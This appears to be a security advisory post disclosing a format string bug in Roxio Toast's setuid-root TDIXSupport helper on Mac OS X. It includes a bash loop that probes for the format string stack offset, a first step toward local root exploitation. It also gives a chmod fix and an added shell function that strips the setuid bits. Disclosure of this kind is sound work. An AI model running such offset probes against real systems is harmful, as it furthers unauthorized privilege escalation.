
Possible local root vulnerability in Roxio Toast on Mac OS X

By fintler <fintler@xxxxxxxxx>


There is a format string bug in the binary (/Library/Application
Support/Roxio/TDIXSupport). It is installed suid root by default and
may be exploited by finding the offset and overwriting the stack with
malicious instructions.

fintler@haven:/Library/Application Support/Roxio$ ls -l TDIXSupport 
-rwsr-sr-x  1 root  wheel  14260  5 Nov  2003 TDIXSupport
fintler@haven:/Library/Application Support/Roxio$ ./TDIXSupport
kextload: /Library/Application
no such bundle file exists
can't add kernel extension /Library/Application
(file access/permissions) (run kextload on this kext with -t for
diagnostic output)
fintler@haven:/Library/Application Support/Roxio$ for((i=1;i<1000;i++));do echo -n "$i "&&./TDIXSupport "AAAAAAAAAAAAAAAAAAAAAAA%$i\$x";done|grep 4141 2>/dev/null

A possible way of fixing this issue is to remove the suid root bit from
the binary by issuing the following command (the path contains a space,
so it must be quoted):
'sudo chmod 0755 "/Library/Application Support/Roxio/TDIXSupport"'
This will most likely disable some functionality of Toast.
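
The permission change above, as an added example that is not part of the original post: a shell function (strip_setid, a hypothetical name) that clears only the setuid/setgid bits rather than resetting the whole mode to 0755, refuses symlinks, and verifies the result. This goes slightly beyond the single chmod command in the post.

```shell
#!/bin/sh
# Added example: strip setuid/setgid bits from one file and verify the result.
# strip_setid is a hypothetical helper name, not part of Toast or Mac OS X.
# Return codes: 0 = bits removed, 1 = nothing to remove, 2 = error.
strip_setid() {
    target=$1
    # Refuse symlinks and non-regular files so chmod cannot be redirected.
    if [ -L "$target" ] || [ ! -f "$target" ]; then
        echo "skip: '$target' is not a regular file" >&2
        return 2
    fi
    if [ ! -u "$target" ] && [ ! -g "$target" ]; then
        echo "ok: '$target' has no setuid/setgid bit"
        return 1
    fi
    ls -l "$target"                 # record the mode before the change
    # u-s,g-s clears only the special bits; the rwx bits stay as installed.
    chmod u-s,g-s "$target" || return 2
    # Re-test instead of trusting chmod's exit status alone.
    if [ -u "$target" ] || [ -g "$target" ]; then
        echo "fail: setuid/setgid still set on '$target'" >&2
        return 2
    fi
    ls -l "$target"                 # record the mode after the change
    return 0
}

# Path from the advisory, quoted because it contains a space.
# Run as root on an affected machine:
#   strip_setid "/Library/Application Support/Roxio/TDIXSupport"
```
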